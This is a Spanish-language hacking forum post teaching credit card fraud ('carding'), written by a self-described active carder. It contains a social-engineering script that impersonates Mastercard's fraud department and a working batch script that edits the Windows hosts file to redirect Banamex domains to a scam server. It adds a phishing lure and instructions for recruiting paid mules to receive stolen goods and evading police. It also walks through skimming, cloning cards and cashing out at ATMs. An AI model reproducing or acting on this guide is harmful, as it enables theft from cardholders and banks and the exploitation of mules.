Hola ke tal usuarios de la mejor web de hacking

www.cascanolahack.org
Soy m4r1lyn y este es mi primer aporte a esta web
Mis temas favoritos del hacking son todos pero me inclino
más por el carding y el phreaker pero iniciare con un post
de carding
NOTA: Esta información es educativa y no me hago
responsable de el uso que le den…el uso es responsabilidad
de quién lo usa
Primero que nada un poco de teoría (es aburrida pero sino
la tienes presente ¿como quieres cardear?)

Carding = Uso ilegal de las tarjetas de crédito y sus

números y a la persona que practica el carding se le
denomina carder.
Dromp = Compañero del carder es la persona que recibe el
objeto comprado por el carder.
Sitio Cardeable = pagina web que te pide pocos datos para
Comprar.
Scam Fake = Se denomina scam (estafa en inglés) a una
Pagina web, cuyo objetivo es robar información de
la persona.
Letter = Mensaje que se le envía a la "victima", como una
Promoción para que la "victima" caiga en el scam.
Skimmer = En español se le suele llamar copiado de
Tarjetas.
Cashear = Sacar el dinero de la tarjeta de crédito.
Mailer o SPAMMER = Código php que se usa para enviar
correos anónimos.

ADVERTENCIA: El carding es uno de los métodos mas riesgosos

ke existen en el hacking cualquier fallo en el proceso
puede privarte de la libertad y colocarte tras las rejas
muchos años

Bueno iniciemos por el número de la tarjeta de crédito

Este esta conformado por 16 dígitos (números) divididas por
4 partes de 4 dígitos cada una (no siempre serán 16 dígitos
esto depende de la tarjeta de crédito pero las mas
conocidas como mastercard y VISA tienen 16 dígitos)

En el carding las cosas más importantes no son simplemente

el número de la tarjeta de crédito (como lo mencionan
muchas webs)
Además del número de la tarjeta de crédito también es
importante la fecha de vencimiento y los datos de la
victima

Primero veamos las formas de conseguir datos de una tarjeta

de crédito existen varios métodos los mas efectivos son los
siguientes

Ingeniería Social

La ingeniería social es un método muy antiguo pero efectivo

para realizar este método solo necesitas conocer a tu
victima y saber algunos datos de ella y además un buen
letter (mensaje que sea creíble por la victima claro que
encontraras victimas con mas conocimiento y para que estas
caigan necesitaras un letter muy bien estructurado y otras
victimas que con solo decirles “dame tus datos de tu
tarjeta de crédito te los darán” jejeje)

Un ejemplo es conseguir los datos (numero de teléfono,

dirección, correo electrónico, etc.)De un usuario de algún
banco, le llamas o mandas un correo electrónico y le dices

"Buenas tardes, soy ·············· de la sección fraudes de

Mastercard, hemos detectado un posible uso fraudulento de
su tarjeta, por lo que necesitamos que nos indique todos
los datos de la misma, para realizar una comprobación"

Pharming

Este método es la evolución del Phishing y es la

explotación de una vulnerabilidad en el software de los
servidores DNS (Domain Name System) o en el de los equipos
de los propios usuarios, que permite a un atacante
redireccionar un nombre de dominio (domain name) a otra
máquina distinta.
Para realizar este método necesitas un Host (de paga con IP
fija), un letter, el SPAMMER para mandar el correo con el
letter, y este código para bloquearle ala victima la web
original
Ejemplo de Pharming a BANAMEX

@echo off
echo 99.129.199.89 http//banamex.com
>>%windir%\System32\drivers\etc\hosts
echo 99.129.199.89 www.banamex.com
>>%windir%\System32\drivers\etc\hosts
echo 99.129.199.89 banamex.com
>>%windir%\System32\drivers\etc\hosts
Donde: 99.129.199.89 = Ip fija de mi host donde se
encuentra mi scam de BANAMEX
Donde: >>%windir%\System32\drivers\etc\hosts = la ruta del
archivo que se va a modificar para hacer la redirección a
nuestro scam
Donde: //banamex.com, www.banamex.com, banamex.com = son
las diferentes formas de entrar a la paguina de BANAMEX y
así al seleccionar cada una de las formas mencionadas sea
redireccionado a el scam (si solo pusiéramos
www.banamex.com y la victima entrara a la web de BANAMEX
como banamex.com la victima entraría a la pagina verdadera)

Ejemplo para conseguir datos de la tarjeta de crédito con

Pharming

“En hora buena ha recibido correctamente la actualización

de BANAMEX por lo que se le pedirá que compruebe su
información de su cuenta en un plazo de 72 horas y podrá
realizar la comprobación de sus datos desde nuestra pagina
oficial www.banamex.com”

Existen más métodos de conseguir datos de una tarjeta de

crédito por ejemplo: Phishing, scam fake, etc.

Bueno seguimos…
Cuando ya tenemos los datos de la tarjeta de crédito entra
una pregunta ¿Qué quiero hacer con ella? Yo en lo
particular tengo un poco mas de 2 años cardeando y bueno
esto es lo que podemos hacer

 Comprar un software en internet

 Comprar un objeto por internet
 Pasar el dinero a su cuenta
 Sacar el dinero desde un cajero

Intentare seguir explicándolo muy bien (ya me dio flojera

además por estar escribiendo esto para ayudarles no he
cardeado el pan de cada día jejeje xD)

Antes de pasar a explicarles esto tenemos que tener en

cuenta los siguientes puntos para protegernos o para algo
les servirán (eso espero) (Son como las reglas de un
carder)

 Las compras que se suelen hacer son mediante Internet

o telefónicamente no de montos muy altos para que no
se pida confirmación al dueño de la tarjeta y para no
levantar sospechas
  El carder es muy cuidadoso no puede andar gritando al
mundo sus hazañas, si hace un pedido de un articulo no
puede pedir otro y otro articulo a la misma dirección
tiene que ir rotando de lugares.
 Generalmente si el encargo esta en la oficina de
correos el ira cuando no haya nadie si estuviera mucha
gente preferirá no arriesgarse y ni siquiera acercarse
mas al lugar ya que podría resultar peligroso para el
 Un carder nunca pide algo gigante no se comprara un
carro para que le traigan por DHL ni tampoco algo muy
baratito pero estaría bien que se compre un celular
ultimo modelo o un Xbox ese es un buen carder.
 El problema que se podría presentar es que el carder
cada vez quiere comprar algo mas y no para se vuelve
mas adicto por el riesgo y por que se esta comprando
buenas cositas pero no se da cuenta que tal vez lo
tiene fichado y próximamente le haga una visita la
policía. (Estas reglas las leí por ahí no son mías
pero hasta cierto punto son ciertas es por eso que las
anoto aquí)

Iniciemos con la primera opción comprar un software por

internet o un host de paga. Existen dos formas

1.-Descargas el software y compras el sereal

Esta es una de las formas mas fáciles para iniciarse en el
carding (no pensaran que en el primer intento de carding
compraran un Xbox verdad). Aquí solo te pedirán los datos
de tu tarjeta de crédito y tu correo al que te mandaran el
sereal (recomiendo crear un nuevo correo para cada caso y
que sea parecido al de la victima ejemplo Correo de la
victima: catalina@hotmail.com Correo parecido: catalina-
hdz@hotmail.com)
2.-Comprar el software y enviártelo a tu casa
Para esta opción necesitas un dromp que reciba las cosas
que compraras esto es lo mismo que comprar un objeto asi
que lo explicare abajo.

Seguimos con la segunda opción que es Comprar un objeto por

internet

Para realizar esta opción necesitamos un amigo cercano o

alguien que necesite dinero pues a estos dromps tenemos que
darles una mordida (sobornarlos) (familia no o como quieran
pero regularmente la familia te dirá “no eso es peligroso
como crees” y cosas así)

Explico la función del dromp: este recibirá la mercancía

comprada y si hay algún problema y la policía crea que es
un carder el dromp dirá que el no ha ordenado nada, la
policía investigara la ip y datos del comprante al ver que
no coinciden no le harán nada a el dromp y se llevaran la
mercancía diciéndole que fue un error, si no hubo nada de
errores y la mercancía la dejan en su buzón o la entregan
sin problemas el dromp entregara la mercancía al carder y
este recibirá su parte.. Tener en cuenta que la policía
podría entregar la mercancía sin problemas y vigilar a el
dromp para que los lleve al carder, yo utilizo por lo
general varios dromps y el que recibe las cosas esta un
poco lejos de mi casa a si este recibe la mercancía y la
entrega a otro dromp y este mela da a mi y los dromps
reciben su paga.

Para comprar el objeto recordar buscar un sitio Cardeable

que nos pide pocos datos para comprar lo deseado y esperar
a que el dromp te entregue el articulo comprado

Seguimos con la tercera opción que es Pasar el dinero a su

cuenta

Esto nunca lo he intentado yo por que no tengo cuenta en

ningún banco pero un amigo me ha dicho que para realizar
una transferencia de dinero a otra cuenta necesita más
requisitos y solo los más necesitados y experimentados lo
logran (el solo lo ha logrado pocas veces y como lo realizo
en el mismo banco, la siguiente vez que lo intento no pudo
pero bueno el se conformo con lo mucho que logro sacar)

La última opción que explicare es sacar el dinero desde un

cajero

Esta opción es muy peligrosa pero muy fácil (xD) no

recomiendo que la intenten por que los ricos pueden pasar a
pobres y ustedes pasar a ricos jejeje
Aki en este punto el carding se relaciona con otro método
llamado Skimming (xD esto es de lo mejor) para explicar
este tema tomare prestadas unas imágenes de unas noticia
jejeje
Skimming: Clonación de tarjetas de credito

El Skimming, consiste en la duplicación de tarjetas de

crédito o debito con ayuda de dispositivos electrónicos sin
el consentimiento del dueño de la tarjeta. Los dueños de
las tarjetas de crédito no se dan cuenta de esto hasta que
les llega el estado de cuenta o cuando van a comprar algo
en una tienda o por internet con su tarjeta y le dicen que
su tarjeta está al límite o se la rechazan (declined).
Por lo general los carders usan un skimmer de bolsillo para
leer los datos de la tarjeta de crédito y esto es mas fácil
cuando el carder trabaja en una tienda o restaurante donde
acepten tarjeta de crédito (Buen pretexto no)

El carder pasa la tarjeta de crédito por el skimmer de

bolsillo (cabe en la palma de la mano por su tamaño)y
conecta el skimmer a una computadora para pasar la
nformacion a la computadora

Después el carder conecta un codificador de tarjetas de

crédito pasa la información capturada por el skimmer al
codificador toma una tarjeta en blanco con cinta magnetica
y la pasa por el codificador para grabarle la información
capturada por el skimmer y resulta un clon de la tarjeta de
la victima

Bueno tenemos la tarjeta clonada bien ahora tenemos que

buscarnos un cajero (algunos están en las calles y por lo
general sin vigilancia) perfecto hemos encontrado uno si
esta retirado de algún lugar con policías es perfecto (si
hay algún error tenemos mínimo algunos segundos para
ocultarnos antes de que lleguen los polis)
Bueno una vez hemos encontrado el cajero supongo que ya
saben como sacar el $$$$$$$$$$

Bueno para trabajos mas exactos o si decean que la tarjeta

en blanco se vea mas real solo necesitamos paciencia y algo
de imaginación
Les dejare este tutorial que me encontré en una web y pues
lo pongo por que funciona esta probado por mi..